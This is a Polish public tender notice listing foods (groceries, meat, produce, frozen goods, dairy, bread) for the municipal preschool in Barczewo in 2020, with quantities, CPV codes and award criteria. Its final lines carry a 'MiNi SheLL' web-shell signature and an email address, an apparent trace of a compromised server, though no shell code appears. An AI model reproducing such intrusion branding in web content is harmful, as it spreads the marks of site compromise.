20szt	pacz	30032	Herbata granulowanaop.100g	Szt.	22033	Sok pomarańczowy naturalny 100% zawartość cukru do 10g w 100ml gotowego produktu op.1000ml	L	5034	Biszkopty op.250-500g	kg	9035	Sok pomidorowy naturalny 100% op.1000ml( zawartość soli, sodu w 100g gotowego produktu max.10g-12g)	L	2036	Keczup pomidorowy, łagodny w opakowaniach szklanych op. 200g	Szt.	25037	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt.	15038	Pieprz ziołowy w oryginalnych opakowaniach Szt.	4039	Ziele angielskie w oryginalnych opakowaniach op. co najmniej 14g	Szt.	2040	Liść laurowy w oryginalnych opakowaniach Szt.	2041	Kukurydza konserwowa puszka waga ok.400g.	Szt.	10042	Zioła prowansalskie w oryginalnych opakowaniach op.min.10g	Szt.	8043	Proszek do pieczenia	Szt.	1044	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	Szt.	6045	Chrzan tarty słoik op. co najmniej 170g z kwaskiem cytrynowym	Szt.	8046	Groszek konserwowy w puszce w oryginalnych op.400g	Szt.	2047	Papryka mielona słodka w oryginalnych op.16g	Szt.	10048	Przyprawa Curry op.20g	Szt.	2049	Przyprawa Kurkuma op.10-20g	Szt.	2050	Majeranek otarty waga co najmniej 6g	Szt.	10051	Wafle suche prostokątne waga co najmniej 146g	Szt.	23052	Rodzynki op.100g	Szt.	5053	Imbir mielony przyprawa	Szt.	554	Cukier waniliowy	Szt.	5055	Kwasek cytrynowyop.20g	Szt.	1056	Musztarda słoik op. co najmniej 180g	Szt.	8057	Miód naturalny wielokwiatowy op.370g	Szt.	175058	Ananas plastry puszka waga bez odcieku co najmniej 565g	Szt.	15059	Cynamon mielony przyprawa	Szt.	560	Goździki przyprawa	Szt.	561	Bazylia suszona przyprawa	Szt.	3062	Mango pulpa, opakowanie min 850 g	Szt.	3063	Soki owocowo-warzywne naturalne 100% op.1000ml(np marchew, jabłko; marchew-banan)	L	2064	Cukier puder op. co najmniej 500g	kg	565	Tymianek suszony waga co najmniej10g	Szt.	1066	Oregano suszone waga co najmniej 10g	Szt.	5067	Fasola czerwona w puszce waga co najmniej 400g	Szt.	15068	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek, bazylia, pomidory) op. co najmniej0,25l	L	569	Soczewica czerwona połówki op. 500-1000g	kg	3070	Pomidory w puszce bez skórki( z otwieraczem) op. co najmniej 400g	Szt.	38071	Kawa zbożowa sypana op. co najmniej 200g	Szt.	2072	Ciecierzyca op. 500-1000g	kg	1073	Drożdże świeże	kg	774	Wafle ryzowe op. 100g	Szt.	35075	Brzoskwinie w puszce	Szt.	30076	Gałka muszkatołowa mielona	Szt.	1077	Kolendra suszona przyprawa	Szt.	1078	Lubczyk suszony przyprawa	Szt.	1079	Rozmaryn suszony przyprawa	Szt.	1080	Kasza kus kus op. 400-1000g.	kg	1081	Kasza bulgur op. 400-1000g.	kg	1082	Kasza orkiszowa op. 400-1000g.	kg	1083	Płatki żytnie op. 400-1000g.	kg	1084	Płatki orkiszowe op. 400-1000g.	kg	1085	Płatki pszenne op. 400-1000g.	kg	1086	Mąka orkiszowa typ 2000, op. 400-1000g.	kg	587	Siemię lniane op. 400-1000g.	kg	488	Wiórki kokosowe op. 400-1000g.	kg	289	Sezam op. 400-1000g.	kg	2<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03000000-1, 15600000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-02<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zakup, dostawa i rozładunek mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Karkówka surowa wieprzowa bez kości	kg	2802.	Łopatka wieprzowa surowa bez kości	kg	6503.	Wołowina surowa ligawa	kg	2004.	Cielęcina gulaszowa surowa	kg	355.	Szynka wieprzowa surowa bez kości, bez skóry	kg	2006.	Filet z indyka surowy	kg	2007.	Filet z kurczaka surowy	kg	5808.	Schab bez kości surowy wieprzowy	kg	3009.	Udka bez grzbietu z kurczaka surowe	kg	12010.	Antrykot wołowy surowy	kg	2011.	Żebra wołowe surowe	kg	2012.	Porcje rosołowe z kurczaka	kg	4013.	Wątróbka drobiowa surowa	kg	1014.	Parówki wp. cienkie o zwartości co najmniej 71% mięsa wp.	kg	2015.	Łopatka wp. Pieczona skład: łopatka wp min. 73%,woda,sól,naturalne przyprawy.	kg	5016.	Szynka wiejska o wyczuwalnym smaku i zapachu użytych przypraw, mięso wp.min.75%,sól,przyprawy naturalne, woda	kg	7017.	Kiełbasa krakowska sucha .Wyrób w osłonce białkowej. Składniki: mięso wp.(100g produktu otrzymano z 112g mięsa wp.)Wyczuwalny smak i zapach użytych przypraw naturalnych.	kg	3018.	Kiełbasa krakowska parzona baton. Kiełbasa gruborozdrobniona,,wędzona i parzona. Mięso wp. min 63%,sól,woda,przyprawy naturalne wyczuwalne w smaku.	kg	3019.	Polędwica sopocka wp. klasa I .Mięso wp.(schab b/k) min.90%,woda,sól,przyprawy naturalne.	kg	10020.	Szynka wp. gotowana. kl.I. Mięso wieprzowe min 80%.woda,sól,przyprawy naturalne.	kg	7021.	Kiełbasa cienka wp. podsuszana o zawartości mięsa min.72%.	kg	4022.	Filet wędzony z indyka o zawartości mięsa z indyka min 80%,woda, sól, przyprawy naturalne wyczuwalne w smaku i zapachu.	kg	5023.	Karkówka pieczona, Mięso wp.min 82%,woda,sól,przyprawy naturalne.	kg	5024.	Filet drobiowy gotowany, mięso z fileta drobiowego min 80%,woda, sól, przyprawy naturalne wyczuwalne w smaku i zapachu.	kg	5025.	Schab pieczony, mięso wp. min 90%,sól,woda,przyprawy naturalne wyczuwalne w smaku.	kg	3026.	Kiełbasa żywiecka podsuszana wp. baton, mięso wp min 80%,sól,woda,przyprawy naturalne.	kg	60<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03000000-1, 15100000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-02<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Zakup, dostawa i rozładunek ziemniaków, warzyw, jarzyn, owoców, owoców tropikalnych, orzechów.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Ziemniaki	kg	60002	Ziemniaki młode	kg	8003	Marchew świeża korzeń	kg	14004	Pietruszka świeża korzeń	kg	1505	Cebula biała	kg	2006	Cebula czerwona	kg	407	Seler świeży korzeń	kg	2508	Por świeży	kg	2509	Kapusta czerwona świeża	kg	15010	Pieczarki świeże kg	2011	Czosnek kraj pochodzenie polska główka Szt.	10012	Szczypior świeży pęczek	Szt.	70013	Rzodkiewka pęczek	Szt.	80014	Rzodkiew biała świeża	kg	10015	Sałata lodowa ,pakowana główka	Szt.	32016	Sałata zielona świeża główka	Szt.	35017	Pomidory czerwone, świeże	kg	55018	Ogórek św. szklarniowy	kg	35019	Ogórek świeży, zielony gruntowy	kg	20020	Ogórek kwaszony	kg	25021	Kapusta kwaszona biała	kg	22022	Kapusta pekińska kg	20023	Kapusta biała słodka, główka	kg	20024	Kapusta biała młoda, główka	kg	5025	Papryka czerwona , żółta, zielona	kg	35026	Cytryna świeża	kg	25027	Jabłka świeże	kg	300028	Banany świeże	kg	120029	Gruszki świeże	kg	70030	Kiwi świeże	kg	20031	Mandarynki świeże	kg	30032	Winogrona zielone bezpestkowe	kg	26033	Śliwka fioletowa duża	kg	10034	Brzoskwinie	kg	12035	Winogrona granatowe bezpestkowe	kg	10036	Koper zielony, świeży pęczek 100g	Szt.	100037	Natka pietruszki świeża pęczek 100g	Szt.	100038	Burak czerwony świeży	kg	60039	Truskawka świeża (w sezonie)	kg	15040	Arbuz	kg	20041	Fasola sucha średnia op.400-1000g	kg	2542	Groch połówki op. 400-1000g	kg	2543	Ogórek małosolny (w sezonie)	kg	2044	Nektarynki	kg	9045	Pomarańcze	kg	35046	Pestki słonecznika op.50-100g łuskane	kg	1547	Żurawina suszona op.250-1000g	kg	2048	Kalafior świeży	Szt.	10049	Brokuły świeże	Szt.	10050	Botwinka pęcz	10051	Morele suszone	kg	552	Cukinia	kg	3053	Czereśnia (w sezonie)	kg	2054	Bakłażan kg	1555	Dynia	kg	2056	Pestki dyni op. 50-100g łuskane	kg	557	Daktyle suszone, bez pestek	kg	258	Seler naciowy	kg	1059	Mango świeże	kg	3060	Kiełki brokuła	kg	1<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03000000-1, 03200000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-02<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Zakup, dostawa i rozładunek mrożonek dla Przedszkola Miejskiego w Barczewie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Włoszczyzna 4-składnikowa (marchew, por, seler, pietruszka)op.2000-2500g	kg	15002.	Mieszanka 7-składnikowa z kapustą brukselką op. 2000-2500g	kg	2003.	Brokuły mrożone 450g-2500g	kg	2504.	Kalafior mrożony op.450-2500g	kg	1505	Fasolka szparagowa żółta cięta op.450-2500g	kg	1006	Fasolka szparagowa zielona cięta op.450-2500g	kg	1007	Szpinak mrożony mielony.op.450-2500g	kg	1008	Groszek zielony mrożony op.450-2500g	kg	1009	Barszcz ukraiński skład: burak ćwikłowy, kapusta, fasola, marchew, pomidor, seler, cebula) op.450-2500g	kg	9010	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g	kg	20011	Sałatka owocowa 8 składnikowa (ananas, melon, jabłko, brzoskwinia, mandarynka, papaja, winogrona, mango) op.400g-2500g	kg	8012	Truskawka mrożona op.450-2500g	kg	40013	Bukiet warzyw (brokuł, kalafior, marchew)op.450-2500g	kg	20014	Bukiet warzyw (kalafior, fasola szparagowa, marchew, brukselka, groch zielony)lub równoważna op.450-2500g	kg	10015	Marchew kostka op.450-2500g	kg	9016	Marchew z groszkiem op.450-2500g	kg	20017	Wiśnia bez pestek op.450-2500g	kg	35018	Porzeczka czarna mrożona op.450-2500g	kg	5019	Dorsz filet SHP	kg	22020	Miruna filet SHP	kg	29021	Morszczuk filet SHP	kg	19022	Dynia mrożona	kg	16023	Makrela wędzona	kg	10024	Włoszczyzna 3-składnikowa paski op.450-2500g	kg	15025	Ryba sola filet mrożona	kg	10026	Filet z sandacza	kg	5027	Mieszanka kompotowa z owoców leśnych op 2000-2500	kg	2028	Marchewka „Mini”	kg	20029	Mintaj filet SHP	kg	100 30	Maliny mrożone	kg	3031	Jagody mrożone	kg	30<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03000000-1, 15330000-0<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-02<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Mleko folia 2%op.1000ml	L	90002.	Mleko folia 3,2%	L	6003.	Mleko UHT op.1000ml 2%	L	10004.	Mleko UHT op.1000ml 3,2%	L	6005.	Masło ekstra zawierające co najmniej 82% tłuszczu	kg	6506.	Ser Mozarella	kg	507.	Serek homogenizowany wanilia op. co najmniej 135g	Szt.	7508. Jogurt naturalny typu greckiego lub bałkańskiego op. co najmniej 350g zawierający nie więcej niż 0,12g sodu/soli w 100g gotowego do spożycia produktu	L	5009.	Kefir naturalny op. co najmniej350g zawierający nie więcej niż 0,12g sodu/soli w 100g gotowego do spożycia produktu	L	35010.	Śmietana 12% op. co najmniej 400ml	L	60011	Ser żółty typu salami (nie dopuszcza się produktu seropodobnego)	kg	13012	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	13013	Śmietana 10% op 400g	L	25014	Maślanka naturalna1000ml	L	10015	Twaróg krajanka półtłusty	kg	80016	Serek ziarnisty wiejski naturalny op.150-200g	Szt.	20017	Jogurt naturalny 2% tłuszczu op.150g	Szt.	40018	Śmietana 18%op.400ml	L	60<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03000000-1, 15500000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-02<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Chleb pszenno- żytni krojony foliowany waga co najmniej 400-500g	Szt.	19002	Chleb żytni pełnoziarnisty krojony foliowany waga co najmniej 400g	Szt.	3703	Bułki kajzerki waga co najmniej 50g	Szt.	15004	Bułka grahamka waga co najmniej 50 g	Szt.	10005	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane, słonecznik obowiązkowo, pozostałe dowolne) waga co najmniej 400-500g	Szt.	6006	Ciasto drożdżowe z niską zawartością cukru	kg	1307	Chałka zdobna co najmniej 300g	Szt.	6008	Chleb razowy waga min. 400g krojony, foliowany	Szt.	20009	Rogaliki krucho -drożdżowe nadziewane(z niska zawartością cukru)	kg	25010	Bułki z ziarnami dyni waga co najmniej 50g	Szt.	80011	Bułki czerstwe waga co najmniej waga 50g	Szt.	130012	Bułka tarta	kg	8013	Bułka z ziarnami różnymi waga min.50g	Szt.	230014	Bułka razowa z ziarnem waga co najmniej 50 g	Szt.	50015	Chleb wiejski waga min.400g	Szt.	30016	Rogale z makiem waga co najmniej 50g	Szt.	220017	Babka piaskowa	kg	10018	Pączki z nadzieniem owocowym, waga co najmniej 60 g	Szt.	25019	Chleb graham waga co najmniej 400-500g	Szt.	300<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>03000000-1, 15810000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-02<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin płatności</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com